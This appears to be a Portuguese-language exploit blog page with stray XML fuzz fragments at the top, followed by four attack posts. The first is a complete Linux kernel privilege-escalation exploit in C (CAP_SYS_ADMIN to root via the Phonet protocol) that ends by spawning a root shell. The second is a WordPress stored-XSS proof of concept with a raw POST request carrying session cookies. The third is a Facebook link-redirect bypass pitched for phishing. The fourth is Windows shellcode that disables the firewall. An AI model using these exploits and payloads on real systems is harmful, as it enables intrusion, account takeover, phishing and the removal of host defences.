</MyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLong>
</data>
</root>
</XML>

<?xml version="1.0" encoding="utf-8" standalone="yes"?>
<XML ID="xmlid4">
<Devices>
<Device>
<bb />
</Device>
</Devices>
</XML>

<?xml version="1.0" encoding="utf-8" standalone="yes"?>
<XML ID="xmlid5">
<Devices>
<Device>
<BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB />
</Device>
</Devices>
</XML>

<?xml version="1.0" encoding="utf-8" standalone="yes"?>
<XML ID="xmlid6">
<root>
<data>
<CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC>
 value2
</CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC>
</data>
</root>
</XML>

 </body>
</html>

Full disclosure: Ubuntu r00t

Publicado em

Ganho de privilegios root em Ubuntu

Kernel version: 2.6.34 kernel ou superior


/*
 * Linux Kernel CAP_SYS_ADMIN to root exploit
 * by Dan Rosenberg
 * @djrbliss on twitter
 *
 * Usage:
 * gcc -w caps-to-root.c -o caps-to-root
 * sudo setcap cap_sys_admin+ep caps-to-root
 * ./caps-to-root
 *
 * This exploit is NOT stable:
 *
 *  * It only works on 32-bit x86 machines
 *
 *  * It only works on >= 2.6.34 kernels (it could probably be ported back, but
 *    it involves winning a race condition)
 *
 *  * It requires symbol support for symbols that aren't included by default in
 *    several distributions
 *
 *  * It requires the Phonet protocol, which may not be compiled on some
 *    distributions
 *
 *  * You may experience problems on multi-CPU systems
 *
 * It has been tested on a stock Ubuntu 10.10 installation.  I wouldn't be
 * surprised if it doesn't work on other distributions.
 *
 * ----
 *
 * Lately there's been a lot of talk about how a large subset of Linux
 * capabilities are equivalent to root.  CAP_SYS_ADMIN is a catch-all
 * capability that, among other things, allows mounting filesystems and
 * injecting commands into an administrator's shell - in other words, it
 * trivially allows you to get root.  However, I found another way to get root
 * from CAP_SYS_ADMIN...the hard way.
 *
 * This exploit leverages a signedness error in the Phonet protocol.  By
 * specifying a negative protocol index, I can craft a series of fake
 * structures in userspace and cause the incrementing of an arbitrary kernel
 * address, which I then leverage to execute arbitrary kernel code.
 *
 * Greets to spender, cloud, jono, kees, pipacs, redpig, taviso, twiz, stealth,
 * and bla.
 *
 */

#include <stdio.h>
#include <fcntl.h>
#include <sys/socket.h>
#include <errno.h>
#include <string.h>
#include <linux/capability.h>
#include <sys/utsname.h>
#include <sys/mman.h>
#include <unistd.h>

typedef int __attribute__((regparm(3))) (* _commit_creds)(unsigned long cred);
typedef unsigned long __attribute__((regparm(3))) (* _prepare_kernel_cred)(unsigned long cred);
_commit_creds commit_creds;
_prepare_kernel_cred prepare_kernel_cred;

int getroot(void)
{

 commit_creds(prepare_kernel_cred(0));
 return 0;

}

int konami(void)
{

 /* Konami code! */
 asm("inc %edx;"        /* UP */
 "inc %edx;"        /* UP */
 "dec %edx;"        /* DOWN */
 "dec %edx;"        /* DOWN */
 "shl %edx;"        /* LEFT */
 "shr %edx;"        /* RIGHT */
 "shl %edx;"        /* LEFT */
 "shr %edx;"        /* RIGHT */
 "push %ebx;"    /* B */
 "pop %ebx;"
 "push %eax;"    /* A */
 "pop %eax;"
 "mov $getroot, %ebx;"
 "call *%ebx;");    /* START */

 return 0;
}

/* thanks spender... */
unsigned long get_kernel_sym(char *name)
{
 FILE *f;
 unsigned long addr;
 char dummy;
 char sname[512];
 struct utsname ver;
 int ret;
 int rep = 0;
 int oldstyle = 0;

 f = fopen("/proc/kallsyms", "r");
 if (f == NULL) {
 f = fopen("/proc/ksyms", "r");
 if (f == NULL)
 return 0;
 oldstyle = 1;
 }

 while(ret != EOF) {
 if (!oldstyle)
 ret = fscanf(f, "%p %c %s\n", (void **)&addr, &dummy, sname);
 else {
 ret = fscanf(f, "%p %s\n", (void **)&addr, sname);
 if (ret == 2) {
 char *p;
 if (strstr(sname, "_O/") || strstr(sname, "_S."))
 continue;
 p = strrchr(sname, '_');
 if (p > ((char *)sname + 5) && !strncmp(p - 3, "smp", 3)) {
 p = p - 4;
 while (p > (char *)sname && *(p - 1) == '_')
 p--;
 *p = '\0';
 }
 }
 }
 if (ret == 0) {
 fscanf(f, "%s\n", sname);
 continue;
 }
 if (!strcmp(name, sname)) {
 fprintf(stdout, " [+] Resolved %s to %p\n", name, (void *)addr);
 fclose(f);
 return addr;
 }
 }

 fclose(f);
 return 0;
}

int main(int argc, char * argv[])
{

 int sock, proto, i, offset = -1;
 unsigned long proto_tab, landing, target, pn_ops, pn_ioctl, *ptr;
 void * map;

 /* Create a socket to load the module for symbol support */
 printf("[*] Testing Phonet support and CAP_SYS_ADMIN...\n");
 sock = socket(PF_PHONET, SOCK_DGRAM, 0);

 if(sock < 0) {
 if(errno == EPERM)
 printf("[*] You don't have CAP_SYS_ADMIN.\n");

 else
 printf("[*] Failed to open Phonet socket.\n");

 return -1;
 }

 /* Resolve kernel symbols */
 printf("[*] Resolving kernel symbols...\n");

 proto_tab = get_kernel_sym("proto_tab");
 pn_ops = get_kernel_sym("phonet_dgram_ops");
 pn_ioctl = get_kernel_sym("pn_socket_ioctl");
 commit_creds = get_kernel_sym("commit_creds");
 prepare_kernel_cred = get_kernel_sym("prepare_kernel_cred");

 if(!proto_tab || !commit_creds || !prepare_kernel_cred ||
 !pn_ops || !pn_ioctl) {
 printf("[*] Failed to resolve kernel symbols.\n");
 return -1;
 }

 /* Thanks bla, for reminding me how to do basic math */
 landing = 0x20000000;
 proto = 1 << 31 | (landing - proto_tab) >> 2;

 /* Map it */
 printf("[*] Preparing fake structures...\n");

 map = mmap((void *)landing, 0x10000,
 PROT_READ | PROT_WRITE | PROT_EXEC,
 MAP_PRIVATE | MAP_ANONYMOUS | MAP_FIXED, 0, 0);

 if(map == MAP_FAILED) {
 printf("[*] Failed to map landing area.\n");
 return -1;
 }

 /* Pointer to phonet_protocol struct */
 ptr = (unsigned long *)landing;
 ptr[0] = &ptr[1];

 /* phonet_protocol struct */
 for(i = 1; i < 4; i++)
 ptr[i] = &ptr[4];

 /* proto struct */
 for(i = 4; i < 204; i++)
 ptr[i] = &ptr[204];

 /* First, do a test run to calculate any offsets */
 target = 0x30000000;

 /* module struct */
 for(i = 204; i < 404; i++)
 ptr[i] = target;

 /* Map it */
 map = mmap((void *)0x30000000, 0x2000000,
 PROT_READ | PROT_WRITE | PROT_EXEC,
 MAP_PRIVATE | MAP_ANONYMOUS | MAP_FIXED, 0, 0);

 if(map == MAP_FAILED) {
 printf("[*] Failed to map landing area.\n");
 return -1;
 }

 printf("[*] Calculating offsets...\n");

 socket(PF_PHONET, SOCK_DGRAM, proto);

 ptr = 0x30000000;
 for(i = 0; i < 0x800000; i++) {
 if(ptr[i] != 0) {
 offset = i * sizeof(void *);
 break;
 }
 }

 if(offset == -1) {
 printf("[*] Test run failed.\n");
 return -1;
 }

 /* MSB of pn_ioctl */
 target = pn_ops + 10 * sizeof(void *) - 1 - offset;

 /* Re-fill the module struct */
 ptr = (unsigned long *)landing;
 for(i = 204; i < 404; i++)
 ptr[i] = target;

 /* Push pn_ioctl fptr into userspace */
 printf("[*] Modifying function pointer...\n");

 landing = pn_ioctl;
 while((landing & 0xff000000) != 0x10000000) {
 socket(PF_PHONET, SOCK_DGRAM, proto);
 landing += 0x01000000;
 }

 /* Map it */
 map = mmap((void *)(landing & ~0xfff), 0x10000,
 PROT_READ | PROT_WRITE | PROT_EXEC,
 MAP_PRIVATE | MAP_ANONYMOUS | MAP_FIXED, 0, 0);

 if(map == MAP_FAILED) {
 printf("[*] Failed to map payload area.\n");
 return -1;
 }

 /* Copy payload */
 memcpy((void *)landing, &konami, 1024);

 printf("[*] Executing Konami code at ring0...\n");
 ioctl(sock, 0, NULL);

 if(getuid()) {
 printf("[*] Exploit failed to get root.\n");
 return -1;
 }

 printf("[*] Konami code worked!  Have a root shell.\n");
 execl("/bin/sh", "/bin/sh", NULL);

}

WordPress 3.0.3 Stored XSS

Publicado em

Software: wordpress.org

Versão: 3.0.3

Browsers afetados: IE7,6 NS8.1

Autor: Saif

Xss na pagina de post usando estilo CSS

Poc: Postagem com "<IMG STYLE="xss:expression(alert('XSS'))">"

Ou vc pode usar raw request pra implantar o parâmetro com o XSS


POST /wordpress/wp-admin/post.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.15)
Gecko/2009102814 Ubuntu/8.10 (intrepid) Firefox/3.0.15
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Proxy-Connection: keep-alive
Referer:
http://127.0.0.1/wordpress/wp-admin/post.php?post=145&action=edit&message=1
Cookie:
wordpress_5bd7a9c61cda6e66fc921a05bc80ee93=xss%7C1293636697%7C17562b2ebe444d17730a2bbee6ceba99;
wp-settings-time-1=1293196695; wp-settings-time-2=1293197912;
wp-settings-1=m3%3Dc%26editor%3Dhtml; wp-settings-2=editor%3Dhtml%26m5%3Do;
wp-settings-time-3=1293462654; wp-settings-3=editor%3Dhtml;
wordpress_test_cookie=WP+Cookie+check;
wordpress_logged_in_5bd7a9c61cda6e66fc921a05bc80ee93=xss%7C1293636697%7C7437e30b3242f455911b2b60daf35e48;
PHPSESSID=a1e7d9fcce3d072b31162c4acbbf1c37;
kaibb4443=80bdb2bb6b0274393cdd1e47a67eabbd;
AEFCookies2525[aefsid]=kmxp4rfme1af9edeqlsvtfatf4rvu9aq
Content-Type: application/x-www-form-urlencoded
Content-Length: 1655

_wpnonce=aad1243dc1&_wp_http_referer=/wordpress/wp-admin/post.php?post=145&action=edit&message=1&user_ID=3&action=editpost&originalaction=editpost&post_author=3&post_type=post&original_post_status=publish&referredby=http://127.0.0.1/wordpress/wp-admin/post.php?post=145&action=edit&message=1&_wp_original_http_referer=http://127.0.0.1/wordpress/wp-admin/post.php?post=145&action=edit&message=1&post_ID=145&autosavenonce=e35a537141&meta-box-order-nonce=718e35f130&closedpostboxesnonce=0203f58029&wp-preview=&hidden_post_status=publish&post_status=publish&hidden_post_password=&hidden_post_visibility=public&visibility=public&post_password=&mm=12&jj=27&aa=2010&hh=15&mn=31&ss=55&hidden_mm=12&cur_mm=12&hidden_jj=27&cur_jj=27&hidden_aa=2010&cur_aa=2010&hidden_hh=15&cur_hh=16&hidden_mn=31&cur_mn=02&original_publish=Update&save=Update&post_category[]=0&post_category[]=1&tax_input[post_tag]=&newtag[post_tag]=&post_title=&samplepermalinknonce=ffcbf222eb&content=<IMG+STYLE="xss:expression(alert('XSS'))">&excerpt=&trackback_url=&meta[108][key]=_edit_last&_ajax_nonce=257f6f6ad9&meta[108][value]=3&meta[111][key]=_edit_lock&_ajax_nonce=257f6f6ad9&meta[111][value]=1293465765&meta[116][key]=_encloseme&_ajax_nonce=257f6f6ad9&meta[116][value]=1&meta[110][key]=_wp_old_slug&_ajax_nonce=257f6f6ad9&meta[110][value]=&metakeyselect=#NONE#&metakeyinput=&metavalue=&_ajax_nonce-add-meta=61de41e725&advanced_view=1&comment_status=open&ping_status=open&add_comment_nonce=c32341570f&post_name=145

Facebook Link Redirect

Publicado em

 

Servidor: http://www.facebook.com

Risco: baixo

Autor: SpecTrum_Bill

Faz um bypass no protetor de link do facebook, possibilitando algum tipo de ataque de phishing.

PoC: http://www.facebook.com/l.php?u=https://unauthorizedaccess.wordpress.com&h=5a3db

Shellcode: Killing Firewall Windows

Publicado em

Essa shellcode mata o firewall do windows

Testado em: win32 SP2 e 3


#include <stdio.h>

char code[] = "\xeb\x16\x5b\x31\xc0\x50\x53\xbb\xad\x23\x86\x7c\xff\xd3\x31\xc0\x50\xbb\xfa\xca\x81\x7c"
              "\xff\xd3\xe8\xe5\xff\xff\xff\x63\x6d\x64\x2e\x65\x78\x65\x20\x2f\x63\x20\x6e\x65\x74\x73"
              "\x68\x20\x66\x69\x72\x65\x77\x61\x6c\x6c\x20\x73\x65\x74\x20\x6f\x70\x6d\x6f\x64\x65\x20"
              "\x64\x69\x73\x61\x62\x6c\x65\x00";

int main(int argc, char **argv)
{
    int (*func)();
    func = (int (*)()) code;
    (int)(*func)();
}

Decoded:


cmd.exe /c netsh firewall set opmode disable

Inject payload! ;*